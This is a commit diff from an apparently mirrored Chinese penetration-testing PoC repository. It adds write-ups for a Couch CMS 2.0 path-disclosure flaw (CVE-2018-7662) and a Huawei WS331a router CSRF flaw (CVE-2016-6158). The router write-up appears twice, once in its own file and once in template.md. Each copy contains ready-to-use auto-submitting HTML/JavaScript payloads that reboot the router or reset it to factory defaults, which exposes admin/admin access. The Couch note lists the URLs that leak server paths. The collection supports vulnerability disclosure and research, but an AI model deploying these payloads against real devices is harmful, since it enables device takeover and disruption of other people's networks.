mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-06-20 09:50:19 +00:00
upload
This commit is contained in:
parent
4ce755629e
commit
1e35392d14
21
Couch through 2.0存在路径泄露漏洞.md
Normal file
21
Couch through 2.0存在路径泄露漏洞.md
Normal file
@ -0,0 +1,21 @@
|
||||
### 漏洞简介
|
||||
|
||||
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
|
||||
--------|--------|---------|--------|-------|----|------|
|
||||
|Couch through 2.0存在路径泄露漏洞|2018-03-04| zzw (zzw@5ecurity.cn)|[https://github.com/CouchCMS/CouchCMS/](https://github.com/CouchCMS/CouchCMS/) | [https://github.com/CouchCMS/CouchCMS/](https://github.com/CouchCMS/CouchCMS/) |2.0 | [CVE-2018-7662](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7662)|
|
||||
|
||||
|
||||
#### 漏洞概述
|
||||
|
||||
> Couch through 2.0存在路径泄露漏洞,当访问特定url时系统返回的报错信息中暴露物理路径信息。Couch through是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/CouchCMS/CouchCMS/issues/46)告知作者。
|
||||
|
||||
|
||||
### POC实现代码如下:
|
||||
|
||||
------
|
||||
|
||||
访问如下页面,报错信息中显示完整物理路径信息。
|
||||
|
||||
Location:
|
||||
includes/mysql2i/mysql2i.func.php
|
||||
addons/phpmailer/phpmailer.php
|
@ -11,10 +11,12 @@
|
||||
## IOT Device
|
||||
|
||||
- [天翼创维awifi路由器存在多处未授权访问漏洞](天翼创维awifi路由器存在多处未授权访问漏洞.md)
|
||||
- [华为WS331a产品管理页面存在CSRF漏洞](华为WS331a产品管理页面存在CSRF漏洞.md)
|
||||
|
||||
## Web APP
|
||||
|
||||
- [致远OA_A8_getshell_0day](致远OA_A8_getshell_0day.md)
|
||||
- [Couch through 2.0存在路径泄露漏洞](Couch through 2.0存在路径泄露漏洞.md)
|
||||
|
||||
## Mobile APP
|
||||
|
||||
|
27
template.md
Normal file
27
template.md
Normal file
@ -0,0 +1,27 @@
|
||||
### 漏洞简介
|
||||
|
||||
#### 漏洞概述
|
||||
|
||||
> 华为WS331a 是一款便携无线路由器。
|
||||
> WS331a产品的管理页面中存在一个CSRF漏洞,未经过认证的攻击者可以利用此漏洞发起CSRF攻击。成功利用此漏洞,攻击者可以向受影响设备提交特定请求进而导致设备恢复出厂设置或者重启。 (漏洞编号:HWPSIRT-2016-07078)
|
||||
> 此漏洞的CVE编号为:CVE-2016-6158。
|
||||
|
||||
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
|
||||
--------|--------|---------|--------|-------|----|------|
|
||||
|华为WS331a产品管理页面存在CSRF漏洞|2016-09-07|zixian(me@zixian.org)|[http://www.huawei.com/](http://www.huawei.com/) | [http://www.huawei.com/](http://www.huawei.com/) |WS331a-10 V100R001C02B017SP01及之前版本 | [CVE-2016-6158](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6158)|
|
||||
|
||||
### POC实现代码如下:
|
||||
|
||||
> 当管理员登陆后,打开如下poc页面,WS331a设备将重启。
|
||||
``` html
|
||||
<form action="http://192.168.3.1/api/service/reboot.cgi" method="post">
|
||||
</form>
|
||||
<script> document.forms[0].submit(); </script>
|
||||
```
|
||||
> 当管理员登陆后,打开如下poc页面,WS331a设备将恢复初始化配置。设备自动重启后不需要密码即可连接热点,并使用amdin/admin对设备进行管理控制。
|
||||
|
||||
```html
|
||||
<form action="http://192.168.3.1/api/service/restoredefcfg.cgi" method="post">
|
||||
</form>
|
||||
<script> document.forms[0].submit(); </script>
|
||||
```
|
28
华为WS331a产品管理页面存在CSRF漏洞.md
Normal file
28
华为WS331a产品管理页面存在CSRF漏洞.md
Normal file
@ -0,0 +1,28 @@
|
||||
### 漏洞简介
|
||||
|
||||
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
|
||||
--------|--------|---------|--------|-------|----|------|
|
||||
|华为WS331a产品管理页面存在CSRF漏洞|2016-09-07|zixian(me@zixian.org)|[http://www.huawei.com/](http://www.huawei.com/) | [http://www.huawei.com/](http://www.huawei.com/) |WS331a-10 V100R001C02B017SP01及之前版本 | [CVE-2016-6158](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6158)|
|
||||
|
||||
#### 漏洞概述
|
||||
|
||||
> 华为WS331a 是一款便携无线路由器。
|
||||
WS331a产品的管理页面中存在一个CSRF漏洞,未经过认证的攻击者可以利用此漏洞发起CSRF攻击。成功利用此漏洞,攻击者可以向受影响设备提交特定请求进而导致设备恢复出厂设置或者重启。 (漏洞编号:HWPSIRT-2016-07078)
|
||||
此漏洞的CVE编号为:CVE-2016-6158。
|
||||
|
||||
|
||||
### POC实现代码如下:
|
||||
|
||||
> 当管理员登陆后,打开如下poc页面,WS331a设备将重启。
|
||||
``` html
|
||||
<form action="http://192.168.3.1/api/service/reboot.cgi" method="post">
|
||||
</form>
|
||||
<script> document.forms[0].submit(); </script>
|
||||
```
|
||||
> 当管理员登陆后,打开如下poc页面,WS331a设备将恢复初始化配置。设备自动重启后不需要密码即可连接热点,并使用amdin/admin对设备进行管理控制。
|
||||
|
||||
```html
|
||||
<form action="http://192.168.3.1/api/service/restoredefcfg.cgi" method="post">
|
||||
</form>
|
||||
<script> document.forms[0].submit(); </script>
|
||||
```
|
Loading…
x
Reference in New Issue
Block a user